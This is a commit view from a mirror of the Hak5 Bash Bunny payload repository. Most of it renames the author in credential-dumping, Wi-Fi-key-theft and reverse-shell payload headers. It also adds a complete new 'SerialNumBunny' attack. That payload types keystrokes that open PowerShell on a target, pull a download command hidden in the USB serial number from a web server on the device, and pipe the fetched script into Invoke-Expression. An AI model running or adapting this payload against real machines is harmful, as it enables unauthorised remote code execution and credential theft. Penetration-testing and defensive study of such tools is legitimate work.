hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #655 from 0i41E/master 

Uploaded SerialNumBunny
pull/614/merge
Peaks 2024-06-09 16:30:16 -04:00 committed by GitHub
parent 8cb5a36a68 27ad6acfe2
commit fddae91cc5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
27 changed files with 113 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
payloads/library/credentials/FireSnatcher/README.md
View File

@ -1,7 +1,7 @@
# Title: FireSnatcher # Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases # Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3 # Author: KarrotKak3
# Props: saintcrossbow & 0iphor13 # Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress) # Version: 1.0.2.0 (Work in Progress)
# Category: Credentials # Category: Credentials
# Target: Windows (Logged in) # Target: Windows (Logged in)

2
payloads/library/credentials/FireSnatcher/payload.txt
View File

@ -1,7 +1,7 @@
# Title: FireSnatcher # Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases # Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3 # Author: KarrotKak3
# Props: saintcrossbow & 0iphor13 # Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress) # Version: 1.0.2.0 (Work in Progress)
# Category: Credentials # Category: Credentials
# Target: Windows (Logged in) # Target: Windows (Logged in)

4
payloads/library/credentials/HashDumpBunny/README.md
View File

@ -1,6 +1,6 @@
**Title: HashDumpBunny** **Title: HashDumpBunny**
Author: 0iphor13 Author: 0i41E
Version: 1.0 Version: 1.0
@ -17,4 +17,4 @@ Place BunnyDump.bat in the same payload switch-folder as your payload.txt
# #
Plug in BashBunny. Plug in BashBunny.
Exfiltrate the out.txt file and try to crack the hashes. Exfiltrate the out.txt file and try to crack the hashes.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)

2
payloads/library/credentials/HashDumpBunny/payload.txt
View File

@ -2,7 +2,7 @@
# #
# Title: HashDumpBunny # Title: HashDumpBunny
# Description: Dump user hashes with this script, which was obfuscated with multiple layers. # Description: Dump user hashes with this script, which was obfuscated with multiple layers.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

4
payloads/library/credentials/MiniDumpBunny/README.md
View File

@ -1,6 +1,6 @@
**Title: MiniDumpBunny** **Title: MiniDumpBunny**
Author: 0iphor13 Author: 0i41E
Version: 1.0 Version: 1.0
@ -14,4 +14,4 @@ What is MiniDumpBunny?
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away. Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
# #
Exfiltrate the .dmp file and read it with Mimikatz. Exfiltrate the .dmp file and read it with Mimikatz.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)

2
payloads/library/credentials/MiniDumpBunny/payload.txt
View File

@ -2,7 +2,7 @@
# #
# Title: MiniDumpBunny # Title: MiniDumpBunny
# Description: Dump lsass with this script, which was obfuscated with multiple layers. # Description: Dump lsass with this script, which was obfuscated with multiple layers.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

8
payloads/library/credentials/ProcDumpBunny/README.md
View File

@ -1,6 +1,6 @@
**Title: ProcDumpBunny** **Title: ProcDumpBunny**
Author: 0iphor13 Author: 0i41E
Version: 1.0 Version: 1.0
@ -12,10 +12,10 @@ What is ProcDumpBunny?
**Instruction:** **Instruction:**
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
Place Bunny.exe in the same payload switch as your payload Place Bunny.exe in the same payload switch as your payload
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
# #
Plug in BashBunny. Plug in BashBunny.
Exfiltrate the out.dmp file and read it with Mimikatz. Exfiltrate the out.dmp file and read it with Mimikatz.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)

2
payloads/library/credentials/ProcDumpBunny/payload.txt
View File

@ -2,7 +2,7 @@
# #
# Title: ProcDumpBunny # Title: ProcDumpBunny
# Description: Dump lsass.exe with a renamed version of procdump # Description: Dump lsass.exe with a renamed version of procdump
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

4
payloads/library/credentials/SamDumpBunny/README.md
View File

@ -1,6 +1,6 @@
**Title: SamDumpBunny** **Title: SamDumpBunny**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.0<br> Version: 1.0<br>
@ -21,4 +21,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.** **!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) ![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

2
payloads/library/credentials/SamDumpBunny/payload.txt
View File

@ -2,7 +2,7 @@
# #
# Title: SamDumpBunny # Title: SamDumpBunny
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes. # Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

4
payloads/library/credentials/SessionBunny/README.md
View File

@ -1,6 +1,6 @@
**Title: SessionBunny** **Title: SessionBunny**
Author: 0iphor13 Author: 0i41E
(Credit for SessionGopher: Brandon Arvanaghi) (Credit for SessionGopher: Brandon Arvanaghi)
Version: 1.0 Version: 1.0
@ -19,4 +19,4 @@ Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
# #
Plug in BashBunny. Plug in BashBunny.
Wait for the script to finish and decide what you wanna do with the information gathered Wait for the script to finish and decide what you wanna do with the information gathered
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)

2
payloads/library/credentials/SessionBunny/SessionBunny.ps1
View File

@ -43,7 +43,7 @@
o o
o_ o_
/ ". SessionGopher / ". SessionGopher
," _-" Bunny Edition (0iphor13) ," _-" Bunny Edition (0i41E)
," m m ," m m
..+ ) Brandon Arvanaghi ..+ ) Brandon Arvanaghi
`m..m @arvanaghi | arvanaghi.com `m..m @arvanaghi | arvanaghi.com

2
payloads/library/credentials/SessionBunny/payload.txt
View File

@ -1,7 +1,7 @@
#!/bin/bash #!/bin/bash
# #
# Title: SessionBunny # Title: SessionBunny
# Author: 0iphor13 # Author: 0i41E
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

15
payloads/library/execution/SerialNumBunny/1.PS1 Normal file
View File

@ -0,0 +1,15 @@
#This is just an example script, you may want to replace it with a script of your choice
$Picture=@"
_____ _____ _____ _____ _____ _____ _____ _____ __ __
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
Bash Bunny by Hak5 USB Attack/Automation Platform
"@
Sleep -s 5
Write-Host -ForegroundColor red "$Picture"
Sleep -s 2
Write-Host -ForegroundColor green "SerialNumBunny by 0i41E"

BIN
payloads/library/execution/SerialNumBunny/SerialNumBunny.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 31 KiB

46
payloads/library/execution/SerialNumBunny/payload.txt Normal file
View File

@ -0,0 +1,46 @@
#!/bin/bash
#
# Title: SerialNumBunny
# Description: Execute strings placed in the Bunny serial number
# Author: 0i41E
# Version: 1.0
# Category: Execution
# Attackmodes: HID, RNDIS_ETHERNET
# Starting as Ethernet device only first to get IP
LED SETUP
ATTACKMODE RNDIS_ETHERNET
GET SWITCH_POSITION
GET HOST_IP
# Switch to Ethernet & HID
LED Y
# Defining Device Identifiers - Serialnumber contains payload
ATTACKMODE RNDIS_ETHERNET HID VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_IWR_-URI_HTTP://$HOST_IP/1.PS1
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell"
Q DELAY 500
Q ENTER
Q DELAY 1000
# Make sure that device ID matches what was defined above
Q STRING "((Get-PnpDevice -PresentOnly -Class USB | Where-Object { \$_.DeviceID -like \"*F000*\" } | ForEach-Object { (\$_).DeviceID -split '\\\\' | Select-Object -Last 1 }) -join '').Replace('_', ' ')|iex|iex"
Q DELAY 400
Q ENTER
LED FINISH

19
payloads/library/execution/SerialNumBunny/readme.md Normal file
View File

@ -0,0 +1,19 @@
**Title: SerialNumBunny**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>
**What is SerialNumBunny?**
*It is pretty simple... The BashBunny enables you to set its USB identifiers. You can change VID, PID, Manufacturer and of course, the Serial number. Now we do the little trick here and place our payload within the serial number. Then starting a webserver on the Bunny, where a script is hosted and call the serial number via powershell on the target system. The content of the retrieved script is then executed on the target. Easy as that.*
You can get pretty creative here, from basically calling basic powershell commands, up to this example where you execute remote scripts.
**Instruction:**
- Upload your script or the example provided onto your Bunnys switch folder.
- Plug in the Bunny and let the magic happen.
![SerialNumBunny](https://github.com/0i41E/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226)
_Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._

2
payloads/library/exfiltration/WifiSnatch/payload.txt
View File

@ -2,7 +2,7 @@
# #
# Title: WifiSnatch # Title: WifiSnatch
# Description: Extract wifi information, such as passphrases & SSIDs # Description: Extract wifi information, such as passphrases & SSIDs
# Author: 0iphor13 # Author: 0i41E
# Version: 1.1 # Version: 1.1
# Category: Exfiltration # Category: Exfiltration
# Attackmodes: HID, Storage # Attackmodes: HID, Storage

2
payloads/library/prank/-BB-AcidBurn/README.md
View File

@ -105,7 +105,7 @@ Arf
* [Hak5](https://hak5.org/) * [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG) * [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13) * [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter) * [PhilSutter](https://github.com/PhilSutter)

2
payloads/library/prank/-BB-JumpScare/README.md
View File

@ -93,7 +93,7 @@ I am Jakoby
* [Hak5](https://hak5.org/) * [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG) * [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13) * [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter) * [PhilSutter](https://github.com/PhilSutter)

2
payloads/library/remote_access/PingZhellBunny/Bunny.pl
View File

@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
# #
# Modified by 0iphor13 for PingZhellBunny # Modified by 0i41E for PingZhellBunny
# #
# #
# #

2
payloads/library/remote_access/PingZhellBunny/README.md
View File

@ -1,6 +1,6 @@
**Title: PingZhellBunny** **Title: PingZhellBunny**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.5<br> Version: 1.5<br>

2
payloads/library/remote_access/PingZhellBunny/payload.txt
View File

@ -2,7 +2,7 @@
# #
# Title: PingZhellBunny # Title: PingZhellBunny
# Description: Getting remote access via ICMP # Description: Getting remote access via ICMP
# Author: 0iphor13 # Author: 0i41E
# Version: 1.5 # Version: 1.5
# Category: Remote_Access # Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET # Attackmodes: HID, RNDIS_ETHERNET

4
payloads/library/remote_access/ReverseBunny/README.md
View File

@ -1,6 +1,6 @@
**Title: ReverseBunny** **Title: ReverseBunny**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.5<br> Version: 1.5<br>
@ -8,7 +8,7 @@ Version: 1.5<br>
<p>!Getting remote access via obfuscated reverse shell!<br> <p>!Getting remote access via obfuscated reverse shell!<br>
Upload payload.txt and RevBunny.ps1 onto your Bunny Upload payload.txt and RevBunny.ps1 onto your Bunny
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p> Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>

2
payloads/library/remote_access/ReverseBunny/payload.txt
View File

@ -2,7 +2,7 @@
# #
# Title: ReverseBunny # Title: ReverseBunny
# Description: Get remote access, using an obfuscated powershell reverse shell. # Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.5 # Version: 1.5
# Category: Remote_Access # Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET # Attackmodes: HID, RNDIS_ETHERNET

6
payloads/library/remote_access/ReverseBunnySSL/README.md
View File

@ -1,6 +1,6 @@
**Title: ReverseBunnySSL** **Title: ReverseBunnySSL**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.2<br> Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p> For input and inspiration - Thanks to: Cribbit, sebkinne</p>
@ -26,5 +26,5 @@ I recommend openssl itself or ncat - Example syntax for both:<br>
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell** **Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png) ![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png) ![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)

2
payloads/library/remote_access/ReverseBunnySSL/payload.txt
View File

@ -2,7 +2,7 @@
# #
# Title: ReverseBunnySSL # Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell. # Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13 # Author: 0i41E
# Version: 1.2 # Version: 1.2
# Category: Remote_Access # Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET # Attackmodes: HID, RNDIS_ETHERNET